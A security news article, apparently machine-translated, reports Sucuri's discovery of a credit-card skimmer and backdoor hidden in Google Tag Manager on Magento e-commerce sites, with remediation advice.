- Succuri finds Skimmer credit cards on the electronic commerce site promoted by Magento
- The skimmer was hiding in Google Tag Manager
- At least six websites were committed, experts warned
The cybercriminals were exploiting the Google Tag Manager (GTM) to hide malware at the electronic commerce sites for Magento and steal customer payment information, they have affirmed.
Succuri’s researchers claim to have recently observed one of those attacks in nature, explaining that a client sought help after experiencing the theft of credit card data on their electronic commerce website based in Magento.
Analysts tracked the attack on a malicious script integrated into Google Tag Manager, which seemed to be a legitimate monitoring tool, but was designed to slip away confidential data. Google Tag Manager is a free Google tool that allows website owners and sellers to easily implement follow -up codes (labels) on its website without directly modifying the site code.
Abused in nature
The attackers obfuscated the script, which made detection difficult, and used it to capture the payment details of the payment page before sending them to a remote server.
Succuri also found a back door that gave the attackers persistent access. It was found that at least six websites were infected with the same ID GTM, and one of the domains used in the attack, EurowebmonitorTool [dot] com, now it has been on the blacklist for most security companies.
Using the Google label administrator to deliver malware is not a novelty. The researchers said they covered the technique last year, adding that the new infection indicates that tactics “is still widely used” in nature. Magento, due to their popularity among owners of electronic commerce sites, is a great objective for cybercriminals. Payment information is also quite valuable for cybercriminals, since they can use it to buy malicious products, pay for evil campaigns and more.
To remedy the attack, the website administrators must eliminate any suspicious GTM label, perform a full website scan, ensure that both magento and other extensions are regularly updated and controlled the site and GTM traffic for any unusual activity, suggests Succuri.
